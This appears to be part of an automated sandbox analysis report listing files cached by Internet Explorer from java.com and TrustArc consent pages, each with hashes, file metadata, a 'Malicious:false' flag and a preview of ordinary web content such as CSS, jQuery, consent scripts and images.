                                                                                                                                                                                  SHA-256:8CF75A638B4DB506BC4B28FB12AB33432AC5DA8DD775EC721B4627F8D50246A4
                                                                                                                                                                                  SHA-512:547331AC9047504133D53AED25675BAC90A3FB0FD166E536C23BD0EBD07DDEA75B586428A8E6C4F280A97C66293DE3286A12A8C3FE8AA669C7A8C01202C034ED
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/screen.css
                                                                                                                                                                                  Preview: html, body, div, span, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre, a, abbr, acronym, address, code, del, dfn, em, img, q, dl, dt, dd, ol, ul, li, fieldset, form, label, legend, table, caption, tbody, tfoot, thead, tr, th, td {. margin: 0;. padding: 0;. border: 0;. font-weight: inherit;. font-style: inherit;. font-size: 100%;. font-family: inherit;. vertical-align: baseline.}..body {. line-height: 1.5.}..table {. border-collapse: separate;. border-spacing: 0.}..caption, th, td {. text-align: left;. font-weight: normal.}..table, td, th {. vertical-align: middle.}..blockquote:before, blockquote:after, q:before, q:after {. content: "".}..blockquote, q {. quotes: """".}..a img {. border: 0.}..body {. font-size: 75%;. color: #222;. background: #fff;. font-family: "Helvetica Neue", Helvetica, Arial, sans-serif.}..h1, h2, h3, h4, h5, h6 {. font-weight: normal;. color: #111.}..h1 {. font-size: 3em;. line-height: 1;. margin-bottom: .5em.}..h2 {. font-si
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\theme.min[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):86057
                                                                                                                                                                                  Entropy (8bit):5.293478370265226
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:X+SiP1GohxDDogabxkHB4SpcEkMj/t7KZ/52uFGEeJul1BgJ2tM5Po+bQuo4kQ4H:iNV7KZMoWISJQMdkuo4kQ47GK/
                                                                                                                                                                                  MD5:EB519B683BF8B78B57BBCCB92F2B6FFA
                                                                                                                                                                                  SHA1:02906CED3B1DE28743DCB6CB7BF09F9E89E1FDAC
                                                                                                                                                                                  SHA-256:7ED7C6A415CE8873EE944D54FBD3B886CC9BB0D62B5B6A84E05EBE963C4005AD
                                                                                                                                                                                  SHA-512:29594674F002C9080CD277950EC1C8DB87DA77949C1885AA8A56BF2742FADCB5DD9B240BC3C5DB0F9AF95EDA84CD1044F8CF497B96FE8BD4F75556A263FFECB1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/theme.min.js
                                                                                                                                                                                  Preview: !function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,h=n.hasOwnProperty,a=h.toString,l=a.call(Object),v={};function m(e,t){var n=(t=t||E).createElement("script");n.text=e,t.head.appendChild(n).parentNode.removeChild(n)}function c(e,t){return t.toUpperCase()}var f="3.2.1",k=function(e,t){return new k.fn.init(e,t)},p=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,d=/^-ms-/,y=/-([a-z])/g;function x(e){var t=!!e&&"length"in e&&e.length,n=k.type(e);return"function"!==n&&!k.isWindow(e)&&("array"===n||0===t||"number"==typeof t&&0<t&&t-1 in e)}k.fn=k.prototype={jquery:f,constructor:k,length:0,toArray:function(){return s.call(this)},get:function(e){return null==e?s.c
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\v1[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):71813
                                                                                                                                                                                  Entropy (8bit):5.312055266421633
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:tmTkVZQm0BKGEJcnJGqo01KvJ/xKIqarUKYkI8obCJwl8KBwrAcE4/I36sn:gi10BKGiL0svJ/xKLarrYkI8HJwywvn
                                                                                                                                                                                  MD5:74A54934262638C24F2C3C7FC0078746
                                                                                                                                                                                  SHA1:A60AD452C59E734B476B7CA03D95B2D68BE92314
                                                                                                                                                                                  SHA-256:8952CCC09C989C9864DC4D80FC2FF261A1AEC5CE7E02AD9BFE4D0C71B51928A0
                                                                                                                                                                                  SHA-512:C2D17807CF0F0098AFC21B05BC4E391239C976BD450130D36E14B90C35EAFF8C40D92429F65F37130ABA78C6942F97456CD623DE2571D59F7A020C47BBB8AD7E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent.trustarc.com/asset/notice.js/v/v1.7-1745
                                                                                                                                                                                  Preview: function _truste_eu(){function u(){var h=truste.eu.bindMap;h.feat.isConsentRetrieved=h.feat.crossDomain?h.feat.isConsentRetrieved:!0;if(!u.done&&h.feat.isConsentRetrieved){u.done=!0;truste.eu.ccpa.initialize();truste.eu.dnt();var l=function(){var a=truste.eu.bindMap;if(a.feat.consentResolution){var b=truste.util.readCookie(truste.eu.COOKIE_GDPR_PREF_NAME,!0);if(b&&(b=b.split(":"),!RegExp(a.behavior+"."+a.behaviorManager).test(b[2])&&(/(,us|none)/i.test(b[2])||"eu"==a.behaviorManager&&/implied.eu/i.test(b[2]))))return!0}return!1};.truste.util.fireCustomEvent(h.prefCookie);var a=function(){var a=(new Date).getTime(),b=truste.util.readCookie(truste.eu.COOKIE_REPOP,!0),c=truste.eu.bindMap.popTime;return c&&c!=b&&a>=c}();a&&(h.feat.dropPopCookie=!0);h.feat.isDNTOptoutEvent?h.feat.dntShowUI&&"expressed"==h.behavior&&(truste.eu.clickListener(truste.eu.noticeLP.pn,!0),truste.eu.msg.log("consent",h,h.messageBaseUrl)):null!=truste.util.getIntValue(h.prefCookie)?("expressed"==h.behavior&&(a||l())
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\1.cache[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):19432
                                                                                                                                                                                  Entropy (8bit):5.580344910706707
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:EK6hVeThiUgz4Y5Xhsxt8gCxGe6VtWNBK6Z+JA3jviFlJecNKp139J/ozNJMU:EA97gUz8lxktuKA3DizTyo
                                                                                                                                                                                  MD5:55C52117BF9BC174A987D07FCD7297D5
                                                                                                                                                                                  SHA1:743E92AD8B74903117073C161A376FEEC4BFE6A2
                                                                                                                                                                                  SHA-256:3AC30D3684EF5FAC4D54977D24566AEB45B56D17640DD29BC778A44118B7A822
                                                                                                                                                                                  SHA-512:2CB23BC98BBD9C7C9DC73791903E44E87DE5C6C30A4A9FE55B40278E016505AA7CD2A337A89F570B272683BAADE1AA492C687707C9B5BE74454F87FC1126CF54
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/0D070042D9C67A68E1A4BF804E6E0E06/1.cache.js
                                                                                                                                                                                  Preview: function lp(){}.function asb(){}.function dsb(){}.function gsb(){}.function psb(){}.function aub(){ec()}.function eub(a){this.b=a}.function iub(a){this.b=a}.function Lnb(a){this.b=a}.function Onb(a){this.b=a}.function Snb(a){this.b=a}.function jsb(a){this.b=a}.function vsb(a){this.b=a}.function Ltb(a){this.b=a}.function Otb(a){this.b=a}.function Ttb(a){this.b=a}.function Ytb(a){this.b=a}.function msb(a){ec();this.b=a}.function lub(a){ec();this.b=a}.function _ab(a,b){Dl(a.Qd,b)}.function v7(a,b){Nk(a.Qd,b)}.function x7(a,b){Ok(a.Qd,b)}.function Xtb(a,b){a.b.P=b;Wrb(a.b.s,b)}.function uMb(){uMb=Q5b;YPb(NK.e)}.function Dl(b,a){b.selectedIndex=a}.function ftb(a,b){a.o=b;Ri(4,new Etb(a,b))}.function Zrb(){d8(this,ssb(new tsb(this)))}.function kp(){kp=Q5b;jp=new Ep(xec,new lp)}.function Zab(a,b){Yab(a,b);return a.Qd.options[b].value}.function jtb(a){Rsb();return a!=null&&a.length>0&&!yWb(a,P7b)}.function Yab(a,b){if(b<0||b>=a.Qd.options.length){throw new UTb}}.function atb(a,b){a.O=b;sPb=b;a
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\GoJava[1].jpg
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 125x132, frames 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5138
                                                                                                                                                                                  Entropy (8bit):7.907565594845598
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:T2A9GXRAkg1UYIpLaZwJALfmJSB2vulzEviYHO6tuo8U5GmON0/52twL9:aA9Gtg1UYuLaZWnACgzBaRGmaE52e
                                                                                                                                                                                  MD5:EB9F0779D76A650F83ACA4488C7B303A
                                                                                                                                                                                  SHA1:83165410DE505BA628634CC0CCC7CE737248CAA8
                                                                                                                                                                                  SHA-256:C004C648BEDEF20A52400C2A0CDBC5301ED8FB982D2731798C3620734F145C61
                                                                                                                                                                                  SHA-512:81ABDF6802666D5AED53F5E5F7780877A276585536FC41A878FCBC5E5ABA96DB29A494DF536A7F6F40CFE97C39550D997C8F5A87245BEC3B74DCF8EBB46D5340
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/content/published/api/v1.1/assets/CONT2A739CE297364EFC962C8074B610F485/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
                                                                                                                                                                                  Preview: ......JFIF.....d.d.....C..............................................!........."$".$.......C.........................................................................}..!........................................K..........................!.1...Aaq..."4QRSUt....u....26B...#$b...'3Ccr..................................9.........................!14q......AQRa."...$3..#25B...............?....:...2R...d.3.BaJ.K.AE.Q..$Z.o..........L...K.C4My&...X....*i..........b.SP>....^1O.....m..,.g.E..E_..C...b.SP>....^1O.....m.r..xtG.K~..9x.>..|.=...b.SP>..........~...Tr.}M@.&{h9x.>..|.=.........*.-..........L..r.}M@.&{h;..3.?.U.[.=Q..).5...........L..w,.g.D~(....z.3b.E...U.S....7...r..n0:U.:.{qc...K...>Q.U.6...Na.kp...R.g...6..'.O..G.#."-.M......mD.-V.... B ...."......+_....3.zO....OZ~.AzF...=......W....H.......:.Y..'..d...~....V.J.):sN.,.S.$..*%?..&.1_...E0...q.2..+.Z...L^-..nH....0_.,.j..O<..2.U..Nc.F.B.YB.R...t...g..c..C9.#....A.......u..`.L:.E.`.L.Sw......#.fb.I..:.#..O../H.?....P.J
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\JavaOne(2)(2)[1].jpg
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 125x132, frames 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4960
                                                                                                                                                                                  Entropy (8bit):7.909328562752296
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:HQsYCRWH4SNU2NA03ysP2sGzaXFo9ThquCgNeEKC3OenqzTUDD:HQsaH4SR22nP2sGzaX+Thq/gTKI5qID
                                                                                                                                                                                  MD5:B85FC09ACE4EA90361D6D0953777F962
                                                                                                                                                                                  SHA1:92313189D76D3F36D3727C81FD22268C14136307
                                                                                                                                                                                  SHA-256:6A258C518CC6607283FE30819E15F51680BB08ECE976FEC96D3646B29AA964F7
                                                                                                                                                                                  SHA-512:5B761FF706A496BBFA4D5F2AB3FD8FF8EA8977DA8188D001A61FC0B2EDF66B2BB82A61A2068AED0A0881FBE702A0EF89C6E80F114E8F0DEC04052A58504AAB52
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/content/published/api/v1.1/assets/CONTA16A22C5FE954903AC54EDE7D0200709/native?cb=_cache_97bc&channelToken=1f7d2611846d4457b213dfc9048724dc
                                                                                                                                                                                  Preview: ......JFIF.............C..............................................!........."$".$.......C.........................................................................}..!........................................N............................!1.A."3QRaq.%2b......#$BDt....5CSr.......Td....................................3........................!13...AQRaq...."2...#b...............?..6...i...K..mr..he.P...*?...Iq].....?..~....C..AK5.g..rSp..06.p.j...o...Y.7O.#}..?....O..'.=O..$......Y..$..5w.j7......e~<...P...q.>.s;.s.r?.i..z5r..E....^f..u..f.s..)?;{.}...OH.Uz.61.".*...?.=.>.q..V....U=z.~.*....:}.vcm*K..OL..k..&Do.........y...J.........x.MS.+......^.x..U.j.n3{:...!VL....Wq..."....7..#..X*......>u..vGoE.Gnw$oO}.....uM+.#.F..Gs..S...M7'....v....{.to...-V5...:O..o...)]'-.(,)Aa_P.';.)......%tL[..v6.T..d..4N.AQ ....Z......Ty&.%...|w.....G~.:..mGQ4.......@.O..}I5...mq`.. .[. ..<......bp..|UT......]t..........A^RoU.#..*.......0.."%^,.$.+....I.....(.~v...Q.._...X.
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\config[1].json
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):4375
                                                                                                                                                                                  Entropy (8bit):5.033568563640982
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:Y1+r+F8LpXYGBc7ay+WvnNtiwhbxuToLZdnU/tcst4vEv2rQEv22UUtVtYtqPqrX:/+rpiMcTBcA4vBbLaqyJfVVXTPLW+p
                                                                                                                                                                                  MD5:817137EAB3BC7C4C94511DF4C1EAE840
                                                                                                                                                                                  SHA1:A343F7E63520DEF35468BCB15CD7BBBB6728E191
                                                                                                                                                                                  SHA-256:C8AAC0F54A845CE6CA7D55EFA152423451A7B88E755929C994B86E9136485958
                                                                                                                                                                                  SHA-512:A03987481DD8D81E5A065127AF732D18D2C6D4D3FCAE6DEA0969B93D94BC227C5C918474CC11265304192E5C37F633E6B71970A920AF2F9920AE415C3C978203
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: {"h.key":"T79A9-GDDN2-93ZD5-M6HUR-X83QX","h.d":"java.com","h.t":1620316690009,"h.cr":"5e1097ff0f4c9347efb4edb68d4450ebec43c1f5","session_id":"abb58813-bcce-4a9a-a99d-406ded0233f5","site_domain":"java.com","beacon_url":"//685d5b19.akstat.io/","autorun":false,"instrument_xhr":true,"beacon_interval":60,"BW":{"enabled":false},"RT":{"session_exp":1800},"ResourceTiming":{"enabled":true,"splitAtPath":true},"History":{"enabled":true,"auto":true},"Errors":{"enabled":true,"monitorTimeout":true,"monitorEvents":true,"maxErrors":10,"sendInterval":500},"Continuity":{"enabled":true},"PageParams":{"xhr":"subresource","pageGroups":[{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/$","parameter2":"Homepage","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/download\\/help\\/*","parameter2":"Help Articles","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}\\/download\\/faq\\/*","parameter2":"FAQ Articles","on":["navigation"]},{"type":"Regexp","parameter1":"\\/[\\w-]{2,5}
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\defaultpreferencemanager.nocache[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4867
                                                                                                                                                                                  Entropy (8bit):5.424053024572997
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:gGvaPp1xs4ZqPFxUkttqK0wUlhfBPA/eV8rpRrKpKsE5:Nk1bZCXLUK9OhfxADroI
                                                                                                                                                                                  MD5:93D4EC6A1649B91D22C24C5C75D77924
                                                                                                                                                                                  SHA1:30B431BAB07DF5BF78ABD9F1FD7C6CE1B8CE2493
                                                                                                                                                                                  SHA-256:6A66602BD79BD624A3AE23C153EAFE52C677725341F38D682ED9DE7B0B702790
                                                                                                                                                                                  SHA-512:74EA046922A679284DCF0D04DC6B23A41FA315F1290C563B3155B250BA66CB935B0C76861490C3B28E85DF9B7D73F8067D8C888EE114D205DA8C6BA5927A4ECE
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/defaultpreferencemanager/defaultpreferencemanager.nocache.js
                                                                                                                                                                                  Preview: function defaultpreferencemanager(){var O='',wb='" for "gwt:onLoadErrorFn"',ub='" for "gwt:onPropertyErrorFn"',hb='"><\/script>',Y='#',Gb='.cache.html',$='/',kb='//',Eb='0D070042D9C67A68E1A4BF804E6E0E06',Fb=':',ob='::',Ib='<script defer="defer">defaultpreferencemanager.onInjectionDone(\'defaultpreferencemanager\')<\/script>',gb='<script id="',rb='=',Z='?',tb='Bad handler "',Hb='DOMContentLoaded',ib='SCRIPT',fb='__gwt_marker_defaultpreferencemanager',jb='base',bb='baseUrl',S='begin',R='bootstrap',ab='clear.cache.gif',qb='content',P='defaultpreferencemanager',db='defaultpreferencemanager.nocache.js',nb='defaultpreferencemanager::',X='end',T='gwt.codesvr=',U='gwt.hosted=',V='gwt.hybrid',vb='gwt:onLoadErrorFn',sb='gwt:onPropertyErrorFn',pb='gwt:property',Cb='hosted.html?defaultpreferencemanager',xb='iframe',_='img',yb="javascript:''",Bb='loadExternalRefs',lb='meta',Ab='moduleRequested',W='moduleStartup',mb='name',zb='position:absolute;width:0;height:0;border:none',cb='script',Db='selecting
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\favicon[1].ico
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                                  Entropy (8bit):5.4824647268315285
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:NWlFMVaUsQsV444444wcAKyZmvebayz1Tqn2bz75rajZ0a7VN/GR6abfaHl/:EMwUOVToYvU9Y2n75rajj7WDg
                                                                                                                                                                                  MD5:8E39F067CC4F41898EF342843171D58A
                                                                                                                                                                                  SHA1:AB19E81CE8CCB35B81BF2600D85C659E78E5C880
                                                                                                                                                                                  SHA-256:872BAD18B566B0833D6B496477DAAB46763CF8BDEC342D34AC310C3AC045CEFD
                                                                                                                                                                                  SHA-512:47CD7F4CE8FCF0FC56B6FFE50450C8C5F71E3C379ECFCFD488D904D85ED90B4A8DAFA335D0E9CA92E85B02B7111C9D75205D12073253EED681868E2A46C64890
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/favicon.ico
                                                                                                                                                                                  Preview: ............ .h.......(....... ..... .................................}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..........|.........................................................|...p...............u..z\..z\..z\..z\..z\..z\..z\...............p...v...........................................................v...z..................qU..eG..eH..eG..qU......iL...u...........z..................................................jM...w..........................fH..iK..sV..gJ..fH..sV..........fH...v......................................n..m............}c...w.....................................'v.......`.......................................................e.......e...e.......................................................i......o....p.................................................v....q............................................................z...+z................................................................................................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\get[1].gif
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:GIF image data, version 89a, 133 x 18
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):812
                                                                                                                                                                                  Entropy (8bit):7.606653542056993
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:AxVdAl1OT6u00C6H/NkWUk3sVB3sh+3f77tfusUaGzC7lNe8yhr1blpDXO0quAJ3:6du1pud/NR13kY+3T5ikY7JO0yJZIdE
                                                                                                                                                                                  MD5:67BDF1C74574F113BE0B2B2838723A6B
                                                                                                                                                                                  SHA1:BBC3932F39925D38FB53DC089FB3799547AB2FD7
                                                                                                                                                                                  SHA-256:354FD37BD8E6B64BE30B23DB285EBCF3FEEC8DBE44CE038D583259E7BE40272D
                                                                                                                                                                                  SHA-512:05B86E79E36851EF5B8AF1823D65F9F6FCE85C170C74195E5DAF9EE9731E3705DB4C79C785D6EDF2B106E0B3A87194FEF1BD352F339C098CC5A849EA566B4506
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent.trustarc.com/get?name=oralogo-black.gif
                                                                                                                                                                                  Preview: GIF89a.......}|z...................igf...,*(XWUIGF...875......$" 21/B@>POM/-+" .......b`_...rqp;98... .....!.......,............'~D.P...,...(>l]O....Q.I.G...).+.9....A*Y....z...$ ....CJ.v..v...3b..Ml.._.q......#f.a.R.`.R...]..".{|S..]."._...........]L...........Q..]....=..].....k.z.#..b..."...d...]...^C|t..D.@...A;2.......^..l.x....D..!.....].$....I.>..@....e..A.....0.....d;2..4..A.6v..!..}....u.@B>..P.A dO..^.....H.|..S.........AB...U....<y...%....3beS....R.fd..........A.18......R...%..Z...U-L......a......Hp..s..=....7.h.. L.......p....._|...P.^.......}..:x&...`.NzHi@...=. ...}...F (.v.t....D....m.P.X..v...f..6...t..F.....D&..DD....f.Y..........PZx.....h.......@..(w...%....f..0.#$vQ..p.^'...Nz.X..8....9.(w....`........h.".E.Ai.4.....0.6.HP.....]|"...ah7..6..#...;
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\header[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):56
                                                                                                                                                                                  Entropy (8bit):4.322381431056328
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:FnW0CfpAGjgeJnTH+aHI:FnTCfJEeNTzHI
                                                                                                                                                                                  MD5:D49AB4376BCF767AA505976C21CE99FB
                                                                                                                                                                                  SHA1:67A54CA68A46E20B1081EAE5B36B6396DAB55D5A
                                                                                                                                                                                  SHA-256:EA733AF2869543FF1CD17BC8F77F5CE7BFC0C76EA801EC8B0B92F727B29AC797
                                                                                                                                                                                  SHA-512:998FE632B2B73034C622A7AEDE7735E79F3ED7F9E0B6C87046298B8FCD1D6C6F08546999A027ABA6A2E6E01D97775D8C520A67BC281EDAE956B80FEE3C200D7A
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/translations/root/header.js
                                                                                                                                                                                  Preview: define({select_lang:"Select Language",Search:"Search"});
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\layout[1].htm
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):322
                                                                                                                                                                                  Entropy (8bit):4.560479140514086
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:DxlY1efZT0a6Oi+xDfQMQMEv1UCTDRnhW56eNzSlMv1H:LFTVrZxDBZE93hW56kz59H
                                                                                                                                                                                  MD5:A41911032F556116B5525B553DA01655
                                                                                                                                                                                  SHA1:FFB2132F6CF6F610E70790651DE88E63CE6FF140
                                                                                                                                                                                  SHA-256:3E4AA2CB4D372FCBEBA22C9AA960E8779F44B6C9584A8C555409B2CA5D742897
                                                                                                                                                                                  SHA-512:DFA850FAEE04B38F15653FF551773E727BB1933B8431EC825D90597FF12067D1C327A5EE4FC24032BE64BF012ECCB574B16CCAC24E3479A5FCDD44BC8FDFF098
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_compdelivery/_cache_2094/JCOM-SimplePage_Detail/assets/layout.html
                                                                                                                                                                                  Preview: {{{variantScr}}}.<div class="row">. {{#fields}}. <div class="{{divClass}}">. <div class="jvc0w2" data-hydrate="{{hydrateData}}">. {{{body}}}. </div>. </div>. {{#navWidgets}}. <div id="leftNavSection" class="jvcs0 clearfix">{{{widgetContent}}}</div>. {{/navWidgets}}. {{/fields}}.</div>.
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\loading[1].gif
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:GIF image data, version 89a, 31 x 31
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):2608
                                                                                                                                                                                  Entropy (8bit):7.212558742538955
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:48:opmEwU9deVtdpwUCiesszQwUCivxn3wUCivjvwUCiPF3BZBwUyysnjUTROL:orwmcdpwfBsszQwfSx3wfSjvwf4FRnwj
                                                                                                                                                                                  MD5:394BAFC3CC4DFB3A0EE48C1F54669539
                                                                                                                                                                                  SHA1:5640EA4D0EBA1C390F587EC69463C9A5196B7FA2
                                                                                                                                                                                  SHA-256:EB7CFD3D959B2E09C170F532E29F8B825F9BC770B2279FDE58E595617753E244
                                                                                                                                                                                  SHA-512:A2B86BFEBA74FEAE3247C1C53BBC4C4D922936BC099FA8D8487B20AD0B699EC5D279A94F972BA478000CBF4053BA08FFBB2CA5BA82EE01B680F5033B148BBD69
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/images/loading.gif
                                                                                                                                                                                  Preview: GIF89a................................................................666&&&PPP...ppp...VVV...hhhFFF......HHH222..........................................................................................!..NETSCAPE2.0.....!..Created with ajaxload.info.!.......,...........@.pH......b.$..tx@$.W@e..8>S...-k.\.'<\0.f4..`...../..yXg{.w.Q.o..X.........h...Dd....a....e.Ty..vky.BVe..vC..p..y..C.yFp..Q.pGpP.C.pHp..pIp....pJ......e......X.......e.....p...X....%.ia6....'_S$.jt...EY.<..M..z..h..*AY. ....I8..q...J6c.....N..8/...f...s......!.......,...........@.pH......P ...tx@$.W...8L......'...p.0g...B.h..ew....f.!.Q.mx[.........[... .Dbd...j..x....B..iti...BV[..tC.......f..C.....c..C...gc..D....c.......c.......[...cL...cM...cN..[O...fPba..lB.-.N.....!..t....."..`Q...$}..`.........b..J,{.q.G.....V.....x.I....:A..!.......,...........@.pH......P ...tx@$.W...8L......'...p.0g...B.h..ew....fusD.mx[.........[e.iCbd...j...X.T..jif^.V[..tC..[...f..C.fFc..Q.[Gc..D.cHc...cIc..B.cJ..
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\metrics_group1[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):33056
                                                                                                                                                                                  Entropy (8bit):5.8215192547091705
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:tJJCo9TM7eLE+UOS4bHv/fTzcG8+bau9zaxjPTTkDJa3I97:FCo9OeDS4bHv/fN8+PkwDJa497
                                                                                                                                                                                  MD5:4F50071052FF768850C4E3E86ED7EDAC
                                                                                                                                                                                  SHA1:B8A533324FA59E0D31934A548337AD09D011FBAD
                                                                                                                                                                                  SHA-256:B0254F6D58ECC2EB396CC0722104E42AC097C5FDAF4827571035D2C29A774335
                                                                                                                                                                                  SHA-512:DEB987E6BDCA55ADD4F55C3493658CE4C8F217B195C6524865243A6D8ACB441C0FD018E9EDDB04469C0CC95D0A03F9082DA9F3BF5162CE33D126DC53A1DA17AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/metrics_group1.js
